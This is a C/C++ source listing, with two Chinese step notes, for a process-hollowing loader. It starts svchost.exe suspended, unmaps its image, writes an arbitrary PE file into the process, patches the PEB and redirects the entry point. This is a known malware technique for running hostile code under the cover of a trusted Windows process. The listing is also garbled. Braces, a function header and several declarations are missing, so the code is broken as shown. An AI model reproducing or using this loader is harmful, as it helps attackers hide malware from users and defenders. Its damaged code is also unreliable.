


3、在svchost中开辟几块空间 存放自己的PeLoader、PE文件的ShellCode、参数结构等
5、Hook svchost的OEP 改为PeLoader

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include "psapi.h"

struct PE_Header 
    unsigned long signature;
    unsigned short machine;
    unsigned short numSections;
    unsigned long timeDateStamp;
    unsigned long pointerToSymbolTable;
    unsigned long numOfSymbols;
    unsigned short sizeOfOptionHeader;
    unsigned short characteristics;

struct PE_ExtHeader
    unsigned short magic;
    unsigned char majorLinkerVersion;
    unsigned char minorLinkerVersion;
    unsigned long sizeOfCode;
    unsigned long sizeOfInitializedData;
    unsigned long sizeOfUninitializedData;
    unsigned long addressOfEntryPoint;
    unsigned long baseOfCode;
    unsigned long baseOfData;
    unsigned long imageBase;
    unsigned long sectionAlignment;
    unsigned long fileAlignment;
    unsigned short majorOSVersion;
    unsigned short minorOSVersion;
    unsigned short majorImageVersion;
    unsigned short minorImageVersion;
    unsigned short majorSubsystemVersion;
    unsigned short minorSubsystemVersion;
    unsigned long reserved1;
    unsigned long sizeOfImage;
    unsigned long sizeOfHeaders;
    unsigned long checksum;
    unsigned short subsystem;
    unsigned short DLLCharacteristics;
    unsigned long sizeOfStackReserve;
    unsigned long sizeOfStackCommit;
    unsigned long sizeOfHeapReserve;
    unsigned long sizeOfHeapCommit;
    unsigned long loaderFlags;
    unsigned long numberOfRVAAndSizes;
    unsigned long exportTableAddress;
    unsigned long exportTableSize;
    unsigned long importTableAddress;
    unsigned long importTableSize;
    unsigned long resourceTableAddress;
    unsigned long resourceTableSize;
    unsigned long exceptionTableAddress;
    unsigned long exceptionTableSize;
    unsigned long certFilePointer;
    unsigned long certTableSize;
    unsigned long relocationTableAddress;
    unsigned long relocationTableSize;
    unsigned long debugDataAddress;
    unsigned long debugDataSize;
    unsigned long archDataAddress;
    unsigned long archDataSize;
    unsigned long globalPtrAddress;
    unsigned long globalPtrSize;
    unsigned long TLSTableAddress;
    unsigned long TLSTableSize;
    unsigned long loadConfigTableAddress;
    unsigned long loadConfigTableSize;
    unsigned long boundImportTableAddress;
    unsigned long boundImportTableSize;
    unsigned long importAddressTableAddress;
    unsigned long importAddressTableSize;
    unsigned long delayImportDescAddress;
    unsigned long delayImportDescSize;
    unsigned long COMHeaderAddress;
    unsigned long COMHeaderSize;
    unsigned long reserved2;
    unsigned long reserved3;

struct SectionHeader
    unsigned char sectionName[8];
    unsigned long virtualSize;
    unsigned long virtualAddress;
    unsigned long sizeOfRawData;
    unsigned long pointerToRawData;
    unsigned long pointerToRelocations;
    unsigned long pointerToLineNumbers;
    unsigned short numberOfRelocations;
    unsigned short numberOfLineNumbers;
    unsigned long characteristics;

struct MZHeader
    unsigned short signature;
    unsigned short partPag;
    unsigned short pageCnt;
    unsigned short reloCnt;
    unsigned short hdrSize;
    unsigned short minMem;
    unsigned short maxMem;
    unsigned short reloSS;
    unsigned short exeSP;
    unsigned short chksum;
    unsigned short exeIP;
    unsigned short reloCS;
    unsigned short tablOff;
    unsigned short overlay;
    unsigned char reserved[32];
    unsigned long offsetToPE;

struct ImportDirEntry
    DWORD importLookupTable;
    DWORD timeDateStamp;
    DWORD fowarderChain;
    DWORD nameRVA;
    DWORD importAddressTable;

// This function reads the MZ, PE, PE extended and Section Headers from an EXE file.

bool readPEInfo(FILE *fp, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH,
                SectionHeader **outSecHdr)
    fseek(fp, 0, SEEK_END);
    long fileSize = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    if(fileSize < sizeof(MZHeader))    
        return false;
    // read MZ Header
    MZHeader mzH;
    fread(&mzH, sizeof(MZHeader), 1, fp);
    if(mzH.signature != 0x5a4d)    // MZ
        return false;
    if((unsigned long)fileSize < mzH.offsetToPE + sizeof(PE_Header))  
        return false;
    // read PE Header
    fseek(fp, mzH.offsetToPE, SEEK_SET);
    PE_Header peH;
    fread(&peH, sizeof(PE_Header), 1, fp);
    if(peH.sizeOfOptionHeader != sizeof(PE_ExtHeader))
        return false;
    // read PE Ext Header
    PE_ExtHeader peXH;
    fread(&peXH, sizeof(PE_ExtHeader), 1, fp);
    // read the sections
    SectionHeader *secHdr = new SectionHeader[peH.numSections];
    fread(secHdr, sizeof(SectionHeader) * peH.numSections, 1, fp);
    *outMZ = mzH;
    *outPE = peH;
    *outpeXH = peXH;
    *outSecHdr = secHdr;
    return true;

// This function calculates the size required to load an EXE into memory with proper alignment.

int calcTotalImageSize(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,
                       SectionHeader *inSecHdr)
    int result = 0;
    int alignment = inpeXH->sectionAlignment;
    if(inpeXH->sizeOfHeaders % alignment == 0)
        result += inpeXH->sizeOfHeaders;
        int val = inpeXH->sizeOfHeaders / alignment;
        result += (val * alignment);
    for(int i = 0; i < inPE->numSections; i++)
            if(inSecHdr[i].virtualSize % alignment == 0)
                result += inSecHdr[i].virtualSize;
                int val = inSecHdr[i].virtualSize / alignment;
                result += (val * alignment);
    return result;

// This function calculates the aligned size of a section

unsigned long getAlignedSize(unsigned long curSize, unsigned long alignment)
    if(curSize % alignment == 0)
        return curSize;
        int val = curSize / alignment;
        return (val * alignment);

// This function loads a PE file into memory with proper alignment.
// Enough memory must be allocated at ptrLoc.

bool loadPE(FILE *fp, MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,
            SectionHeader *inSecHdr, LPVOID ptrLoc)
    char *outPtr = (char *)ptrLoc;
    fseek(fp, 0, SEEK_SET);
    unsigned long headerSize = inpeXH->sizeOfHeaders;
    // certain PE files have sectionHeaderSize value > size of PE file itself.  
    // this loop handles this situation by find the section that is nearest to the
    // PE header.
    for(int i = 0; i < inPE->numSections; i++)
        if(inSecHdr[i].pointerToRawData < headerSize)
            headerSize = inSecHdr[i].pointerToRawData;
    // read the PE header
    unsigned long readSize = fread(outPtr, 1, headerSize, fp);
    if(readSize != headerSize)
        return false;    
    outPtr += getAlignedSize(inpeXH->sizeOfHeaders, inpeXH->sectionAlignment);
    // read the sections
    for(i = 0; i < inPE->numSections; i++)
        if(inSecHdr[i].sizeOfRawData > 0)
            unsigned long toRead = inSecHdr[i].sizeOfRawData;
            if(toRead > inSecHdr[i].virtualSize)
                toRead = inSecHdr[i].virtualSize;
            fseek(fp, inSecHdr[i].pointerToRawData, SEEK_SET);
            readSize = fread(outPtr, 1, toRead, fp);
            if(readSize != toRead)
                return false;
            outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH->sectionAlignment);
            // this handles the case where the PE file has an empty section. E.g. UPX0 section
            // in UPXed files.
                outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH->sectionAlignment);
    return true;

struct FixupBlock
    unsigned long pageRVA;
    unsigned long blockSize;

// This function loads a PE file into memory with proper alignment.
// Enough memory must be allocated at ptrLoc.

void doRelocation(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,
                  SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD newBase)
    if(inpeXH->relocationTableAddress && inpeXH->relocationTableSize)
        FixupBlock *fixBlk = (FixupBlock *)((char *)ptrLoc + inpeXH->relocationTableAddress);
        long delta = newBase - inpeXH->imageBase;
            int numEntries = (fixBlk->blockSize - sizeof(FixupBlock)) >> 1;
            unsigned short *offsetPtr = (unsigned short *)(fixBlk + 1);
            for(int i = 0; i < numEntries; i++)
                DWORD *codeLoc = (DWORD *)((char *)ptrLoc + fixBlk->pageRVA + (*offsetPtr & 0x0FFF));
                int relocType = (*offsetPtr & 0xF000) >> 12;
                if(relocType == 3)
                    *codeLoc = ((DWORD)*codeLoc) + delta;
            fixBlk = (FixupBlock *)offsetPtr;

#define TARGETPROC "svchost.exe"

typedef struct _PROCINFO
    DWORD baseAddr;
    DWORD imageSize;

// Creates the original EXE in suspended mode and returns its info in the PROCINFO structure.

    STARTUPINFO si = {0};
    if(CreateProcess(NULL, TARGETPROC,
        NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi))    
        GetThreadContext(pi->hThread, ctx);
        DWORD *pebInfo = (DWORD *)ctx->Ebx;
        DWORD read;
        ReadProcessMemory(pi->hProcess, &pebInfo[2], (LPVOID)&(outChildProcInfo->baseAddr), sizeof(DWORD), &read);
        DWORD curAddr = outChildProcInfo->baseAddr;
        while(VirtualQueryEx(pi->hProcess, (LPVOID)curAddr, &memInfo, sizeof(memInfo)))
            if(memInfo.State == MEM_FREE)
            curAddr += memInfo.RegionSize;
        outChildProcInfo->imageSize = (DWORD)curAddr - (DWORD)outChildProcInfo->baseAddr;
        return TRUE;
    return FALSE;

// Returns true if the PE file has a relocation table

BOOL hasRelocationTable(PE_ExtHeader *inpeXH)
    if(inpeXH->relocationTableAddress && inpeXH->relocationTableSize)
        return TRUE;
    return FALSE;

typedef DWORD (WINAPI *PTRZwUnmapViewOfSection)(IN HANDLE ProcessHandle, IN PVOID BaseAddress);

// To replace the original EXE with another one we do the following.
// 1) Create the original EXE process in suspended mode.
// 2) Unmap the image of the original EXE.
// 3) Allocate memory at the baseaddress of the new EXE.
// 4) Load the new EXE image into the allocated memory.  
// 5) Windows will do the necessary imports and load the required DLLs for us when we resume the suspended 
//    thread.
// When the original EXE process is created in suspend mode, GetThreadContext returns these useful
// register values.
// EAX - process entry point
// EBX - points to PEB
// So before resuming the suspended thread, we need to set EAX of the context to the entry point of the
// new EXE.

void doFork(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,
            SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD imageSize)
    STARTUPINFO si = {0};
    CONTEXT ctx;
    PROCINFO childInfo;
    if(createChild(&pi, &ctx, &childInfo)) 
        LPVOID v = (LPVOID)NULL;
        if(inpeXH->imageBase == childInfo.baseAddr && imageSize <= childInfo.imageSize)
            // if new EXE has same baseaddr and is its size is <= to the original EXE, just
            // overwrite it in memory
            v = (LPVOID)childInfo.baseAddr;
            DWORD oldProtect;
            VirtualProtectEx(pi.hProcess, (LPVOID)childInfo.baseAddr, childInfo.imageSize, PAGE_EXECUTE_READWRITE, &oldProtect);      
            // get address of ZwUnmapViewOfSection
            PTRZwUnmapViewOfSection pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection");
            // try to unmap the original EXE image
            if(pZwUnmapViewOfSection(pi.hProcess, (LPVOID)childInfo.baseAddr) == 0)
                // allocate memory for the new EXE image at the prefered imagebase.
                v = VirtualAllocEx(pi.hProcess, (LPVOID)inpeXH->imageBase, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if(!v && hasRelocationTable(inpeXH))
            // if unmap failed but EXE is relocatable, then we try to load the EXE at another
            // location
            v = VirtualAllocEx(pi.hProcess, (void *)NULL, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                // we've got to do the relocation ourself if we load the image at another
                // memory location        
                doRelocation(inMZ, inPE, inpeXH, inSecHdr, ptrLoc, (DWORD)v);
            // patch the EXE base addr in PEB (PEB + 8 holds process base addr)
            DWORD *pebInfo = (DWORD *)ctx.Ebx;
            DWORD wrote;            
            WriteProcessMemory(pi.hProcess, &pebInfo[2], &v, sizeof(DWORD), &wrote);
            // patch the base addr in the PE header of the EXE that we load ourselves
            PE_ExtHeader *peXH = (PE_ExtHeader *)((DWORD)inMZ->offsetToPE + sizeof(PE_Header) + (DWORD)ptrLoc);
            peXH->imageBase = (DWORD)v;
            if(WriteProcessMemory(pi.hProcess, v, ptrLoc, imageSize, NULL))
                //ctx.Eip = (DWORD)v + ((DWORD)dllLoaderWritePtr - (DWORD)ptrLoc);
                if((DWORD)v == childInfo.baseAddr)
                    ctx.Eax = (DWORD)inpeXH->imageBase + inpeXH->addressOfEntryPoint;    // eax holds new entry point
                    // in this case, the DLL was not loaded at the baseaddr, i.e. manual relocation was
                    // performed.
                    ctx.Eax = (DWORD)v + inpeXH->addressOfEntryPoint;    // eax holds new entry point
                TerminateProcess(pi.hProcess, 0);
            TerminateProcess(pi.hProcess, 0);

int main(int argc, char* argv[]) { if(argc!=2) return 0; char szModulePath[MAX_PATH]; strcpy(szModulePath,argv[1]); FILE *fp = fopen(szModulePath, "rb"); if(fp) { MZHeader mzH; PE_Header peH; PE_ExtHeader peXH; SectionHeader *secHdr; if(readPEInfo(fp, &mzH, &peH, &peXH, &secHdr)) { int imageSize = calcTotalImageSize(&mzH, &peH, &peXH, secHdr); LPVOID ptrLoc = VirtualAlloc(NULL, imageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(ptrLoc) { loadPE(fp, &mzH, &peH, &peXH, secHdr, ptrLoc); doFork(&mzH, &peH, &peXH, secHdr, ptrLoc, imageSize); } else return 0; } fclose(fp); return 1; } else return 0; }

